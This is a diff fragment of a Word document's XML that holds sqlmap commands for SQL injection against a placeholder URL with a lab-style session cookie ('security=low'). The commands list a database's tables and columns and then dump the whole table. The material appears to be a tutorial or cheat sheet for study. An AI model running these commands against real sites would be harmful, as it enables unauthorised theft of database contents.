+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>path.aspx?id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="0A3069"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=1"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=”PHPSESSID</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=1tmgthfok042dslt7lr7nbv4cb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="CF222E"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> security=low” -D </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>database_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --tables  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="59636E"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t># List Columns of that table</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>sqlmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -u </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="0A3069"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"http://domain.com/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="0A3069"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>path.aspx?id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="0A3069"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=1"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=”PHPSESSID</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=1tmgthfok042dslt7lr7nbv4cb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="CF222E"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> security=low” -D </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>database_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -T </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>target_Table</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --columns</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="59636E"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>#Dump all values of the table</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>sqlmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -u </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="0A3069"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"http://domain.com/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="0A3069"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>path.aspx?id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="0A3069"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=1"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=”PHPSESSID</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=1tmgthfok042dslt7lr7nbv4cb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="CF222E"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> security=low” -D </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>database_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -T </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>target_Table</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --dump</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
